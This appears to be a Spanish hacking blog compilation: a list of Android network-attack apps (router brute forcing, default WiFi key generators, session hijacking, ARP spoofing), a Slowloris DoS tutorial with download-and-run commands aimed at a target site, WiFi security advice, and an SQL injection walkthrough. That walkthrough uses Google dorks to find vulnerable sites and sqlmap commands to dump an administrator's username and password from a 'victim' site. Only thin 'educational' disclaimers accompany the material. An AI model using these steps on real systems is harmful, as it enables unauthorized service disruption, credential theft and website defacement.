vamos a mostrar algunas aplicaciones gratuitas que convierten tu Android en un& auténtico road warrior para la auditar la seguridad de todo tipo de redes y sistemas.
Lo primero ya sabes, es necesario que tengas tu Android rooteado, la mayoría de estas aplicaciones lo requieren. Android es prácticamente un Linux, y por lo tanto estas aplicaciones de bajo nivel requieren acceso root a la mayoría de las funciones del sistema.
Vamos con esta auténtica navaja suiza de la seguridad Android:
Router Passwords: más que una aplicación, es una base de datos con toda la información  (login y passwords por defecto) de multitud de routers de todas las marcas.
Router Brute Force si no quieres molestarte mirando el diccionario en la aplicación anterior, puedes intentar averiguarla (por fuerza bruta, usando diccionarios) a través de este programa. Si ya tienes acceso a una red, esta herramienta es perfecta para intentar acceder al router.
Terminal Emulator: necesario, tener siempre a mano una ventana de línea de comandos (shell de Linux) por lo que pueda pasar
Wireless Tether: si necesitas conectar el ordenador a Internet, esta es la aplicación perfecta para hacerlo desde el móvil. Crea un WiFi desde la cual puedes conectar cualquier ordenador y tener acceso a la web.
NetWork Discovery: creo que es la aplicación que más información te ofrece sobre una red. Es capaz de escanear una red y mostrar un listado de todos los dispositivos conectados a la misma con sus respectivas direcciones IP y MAC. Pero no sólo eso, además te lo identifica, si es un router, un PC, una impresora, etc.
PulWifi:muestra las contraseñas por defecto de algunos puntos de acceso WiFi. Soporta las de WLAN_XXXXX, JAZZTEL_XXXXX, YACOMXXXXX, WIFIXXXX, algunos modelos de D-Link y de Huawei. Perfecto para analizar el nivel de seguridad de tu WiFi.
Shark: sniffer  de red que funciona en 3G y Wifi. Es un port del famoso tcpdump. Te permite examinar los paquetes TCP/IP que pasan por tu sistema.
ConnectBot: cliente Telnet/SSH de código abierto, permite también hacer SSH tunneling (técnica utilizada para evitar cortafuegos ó proteger tu información).
WifiAnalyzer: otra herramienta más para analizar a fondo una WiFi. Muestra los canales, MAC, tipo de encriptación y la potencia de la señal. Ideal para encontrar el canal perfecto para ajustar nuestro hardware.
ElectroDroid: cuando tienes que pasar a la acción a nivel hardware, esta aplicación puede que te venga bien. Es una biblioteca de referencia sobre Electrónica, que incluye código de color de resistencias, calculadora de varias fórmulas electrónicas, patillaje de todos los puertos de un ordenador y de aparatos de video, tablas de todo tipo, etc. Indispensable.
WLANAudit: aplicación para encontrar redes WiFi y comprobar su seguridad. Con algunos puntos es capaz de calcular la contraseña por defecto del cifrado empleado.
WiFi File Explorer: permite compartir ficheros desde tu dispositivo móvil. En otras palabras, convierte tu móvil en un servidor de ficheros dentro de la red.
Bluetooth File Transfer: busca, explora y gestiona ficheros en cualquier dispositivo Bluetooth usando FTP y OPP. No sólo vivimos de WiFi’s Wink
Hackers Dictionary: por si olvidas algún término, aquí tienes el famoso Jargon File.
Working with BackTrack: desde la instalación de BackTrack hasta todo tipo de información sobre esta distribución Linux de seguridad. Incluye vídeos y documentos de todo tipo, altamente recomendable.
Droidsheep: si ya conoces Firesheep ya sabes de que va esta herramienta. Como la definen en su web “Secuestro de sesiones en un sólo click”
Faceniff: permite capturar sesiones web sobre wifi. Funciona sobre redes Abierta/WEP/WPA-PSK/WPA2-PSK. Es parecida a Droidsheep.
Router Keygen: al igual que PullWifi, detecta y genera las claves de encriptación (WEP y WPA) por defecto de: Routers basados enThomson (Thomson, SpeedTouch, Orange, Infinitum, BBox, DMax, BigPond, O2Wireless, Otenet, Cyta , TN_private ), DLink (sólo algunos modelos), Pirelli Discus, Eircom, Verizon FiOS (sólo algunos modelos), Alice AGPF, FASTWEB Pirelli and Telsey, Huawei (algunos Infinitum), Wlan_XXXX or Jazztel_XXXX (Comtrend y Zyxel), Wlan_XX (algunos modelos), Ono ( P1XXXXXX0000X ), WlanXXXXXX, YacomXXXXXX y WifiXXXXXX (también conocido como wlan4xx ), Sky V1, Clubinternet.box v1 y v2 (TECOM), InfostradaWifi
Fing – Network Tools: herramienta que nos provee funcionalidades para sacar todo tipo de información de un red: network discovery, escaneo de servicios, ping, traceroute, DNS lookup, etc. Muy completa.
Shark Reader: lector de ficheros pcap. Por lo visto tiene problemas con ficheros grandes, pero nos podría resultar muy útil para echar un vistazo rápido después de haber capturado tráfico de red.
Arpspoof: una utilidad casi indispensable para capturar tráfico de red que no vaya dirigido a nosotros usando lo que se conoce como arp spoofing. Digo casi indispensable, porque que podemos conseguir lo mismo con tcpdump.
tcpdump: este no lo teníamos en la lista y que puede decir de éste. Tcpdump es la herramienta de facto de cualquier máquina *nix, para analizar el tráfico de red y por consiguiente capturarlo. Esta versión para Android no tiene la potencia que la de un sistema *nix, pero nos ofrece las funcionalidades básicas, entre ellas la captura de paquetes.
Anti: Android Network Toolkit es un conjunto de utilidades que nos permite explotar servicios en una red local. Es una especie de mini metasploit para Android. El problema es que tiene varias versiones y con lo que te ofrece la gratuita lo puedes hacer con el resto de herramientas aquí listadas, pero se eres un profesional de la seguridad informática, ésta seria una gran adición a tu caja de herramientas.
Routerpwn: colección de vulnerabilidades para los rourters más conocidos y dispositivos embebidos.

ATAQUE DDOS EN KALI LINUX

Slowloris HTTP DoS

Slowloris es una pieza de software escrito por Robert "RSnake" Hansen, que permite que una sola máquina para derribar el servidor web de otra máquina con efectos mínimos de ancho de banda y secundarios en servicios no relacionados y los puertos. 
Slowloris trata de mantener muchas conexiones con el servidor Web de destino abierto y mantenerlas abiertas el mayor tiempo posible. Esto se logra mediante la apertura de conexiones con el servidor Web de destino y enviar una petición parcial. Periódicamente, se enviará cabeceras HTTP posteriores, añadiendo a pero nunca completar el pedido. Servidores afectados mantendrán estas conexiones abiertas, llenando su piscina máximo conexión simultánea, con el tiempo negando los intentos de conexión adicionales de los clientes.
slowloris
Dejare un link para que puedan copiar el codigo y guardarlo como .pl y los comandos siguientes...  

Go to Terminal
1- wget http://ha.ckers.org/slowloris/slowlor...
2- chmod 777 slowloris.pl
3- perl slowloris.pl
4- perl slowloris.pl -dns www.site.com
.......................................
Codigo de Slowloris
http://pastebin.com/KiN3ZDZR
siguiente comando para ejecutarlo en el terminal de linux


sudo perl slowloris.pl -dns

Captura de pantalla de 2014-02-24 20:21:07

Acrylic es un programa de análisis de redes inalámbricas para windows permite obtener las contraseñas de una red WiFi de forma automática gracias a un conjunto de scripts incluidos en el programa. Estos scripts de generación de contraseñas están programados en c# y es posible agregar nuevos routers según se vayan descubriendo fallos para hackear wifi.
Acrylic Wifi se puede usar para hackear redes y para proteger una red WiFi, ya que permite visualizar cuales son las opciones de seguridad que soporta la red WiFi gracias a su driver que soporta la captura WiFi en modo monitor en windows.
Para cada modelo de router Acrylic busca el nombre de la red WiFi, también llamada SSID, la dirección MAC del punto de acceso BSSID  y el tipo de cifrado que utiliza: WEPWPA o WPA2.
Para cada punto de acceso del que se conozca las claves WiFi que vienen por defecto en el router, Acrylic ejecutará un programa para calcular de forma automática las contraseñas. El numero de scripts para obtener la contraseña genérica es reducido en la actualidad pero aumenta en cada nueva versión del programa. Si se obtiene alguna posible contraseña, se puede probar a conectar a la red probando todas las contraseñas.
escáner WiFi con passwords WPA
Muchos hackers hacen uso de programas como Acrylic para robar wifi. El objetivo de esta herramienta es ayudar a los usuarios a proteger la red WiFi de ataques, saber quién se conecta a mi red wifi y descubrir si las conexiones a la red se realizan desde dispositivos conocidos.
Como recomendación general, la forma más sencilla de proteger nuestra red doméstica es:
  • Usar cifrado WPA2: El el mecanismo de seguridad más robusto que existe hoy en día para redes personales. Nunca uses cifrado WEP! es muy inseguro y puede ser descifrado en cuestión de minutos.
  • Opciones de seguridad: El mecanismo AES o CCMP es la opción más segura en WPA. Desactiva el soporte de TKIP si el router lo permite.
  • Cambiar la clave WiFi del router que viene por defecto, para evitar que nadie pueda calcular la contraseña wifi que viene de fábrica.
  • Poner una contraseña segura: De esta forma se evita que alguien pueda crackear la contraseña probando miles de intentos.
  • Deshabilitar WPS: WPS nos facilita la conexión a la red wifi sin meter la contraseña, y también se lo facilita a terceras personas.
  • Cambiar la contraseña de administración: los routers WiFi vienen con contraseñas por defecto como admin /admin, admin / 1234 , o root / root, que permiten entrar en el router WiFi desde internet. Por seguridad cambia siempre la contraseña genérica.
Acrylic WiFi Profesional es la versión comercial de Acrylic WiFi Free un analizador WiFi que funciona como un sniffer WiFi y permite ver el tráfico de una red WiFi, información de seguridad, canales y te ayudará a optimizar tu red.
Accede a la página oficial de Acrylic WiFi www.acrylicwifi.com para conocer las distintas versiones del software de análisis de redes wifi, canales Wifi, contraseñas WiFi y cobertura y prueba la versión profesional del software.
También te pueden interesar nuestros artículos ¿Qué es WPA-PSK TKIP CCMP? y ¿Es segura una red WPA y WPA2? donde analizamos la complejidad de descifrar contraseñas WiFi.
Advertencias: estos datos solo se proveen con fines educativos, el mal uso de los mismos es pura responsabilidad de cada uno.
¿QUE ES INYECCION SQL?
Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.
El origen de la vulnerabilidad radica en el incorrecto chequeo y/o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o script que esté embebido dentro de otro.
¿Que necesitamos para encontrar sitios vulnerables a Inyección Sql?
Necesitamos algunas Dorks ¿Que es una Dork?
Podríamos definir Dorks como búsquedas avanzadas mediante el uso de operadores complejos que google pone a nuestra disposición, mediante el uso de estas facilidades podemos ahorrarnos el trabajo de buscar vulnerabilidades y dejar que google nos muestra las que encontró y tiene indexadas.
Algunas Dorks:
inurl:index.php?id=
inurl:noticias.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:show.php?id=
inurl:staff_id=
 COMENZAMOS NUESTRO ATAQUE
Buenos amigos muchos personas se han preguntado los métodos que utiliza un cracker para atacar una pagina web y a su vez hacer un defacement, aqui una breve explicación de como encontrar los tipos de vulnerabilidades que utilizan los cracker para hackear una web, empecemos.
Ingresamos a nuestro navegador y entramos a www.google.com  y escribimos lo siguiente:
.php?id=
una vez encontrados los sitios que terminan http://www.dominio.com/ejemplo.php?id=2 empezamos a buscar la vulnerabilidad de la paginahttp://www.dominio.com/ejemplo.php?id=2′; solo agregamos el signo al final de la url   y esta nos mostrara un error en la web asi como nos muestra la imagen
Ahora empezamos con nuestro ataque.  entramos en nuestro Backtarck en:  Applications/BackTrack>Exploitation Tools>Web Exploitation Tools>sqlmap
ya abierta nuestra ventana empezamos a escribir lo siguiente:
1:
ya hecho esto nos arrojara las siguientes tablas así como se muestra en la imagen inferior
2:
Una vez que nos dio esos datos escogemos la ultima para seguir sacando datos de la pagina y escribimos lo siguiente:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db –tables
3:
Ya ingresando nos volverá a dar mas datos.
Ya que nuestro objetivo es sacar la el pass y el nombre de usuario de nuestra pagina escogemos la tabla “usuarios” y escribimos lo siguiente
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios –columns
4:
Una vez obtenido os datos de “usuarios” escribimos lo siguiente:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C usuario –dump
5:
Bingo nos dio las tablas de usuario y password, entonces seguimos sacando datos de nuestra victima
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C usuario –dump
Perfecto =D nos dio el nombre del administrador de la pagina que es “admin”
6:
ahora solo nos falta es sacar el password del administrador y para eso escribimos lo siguiente asi como nos muestra la imagen de abajo
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C password –dump
Y BINGO..!!! nos dio el password de la pagina que es “desarrollo” xD xD xD xD….
recuerden este es un tutorial de aprendizaje sobre como saber lo vulnerable que son las paginas web y ver sus fallos, no me responsabilizo sobre el mal uso que le lleguen a daR.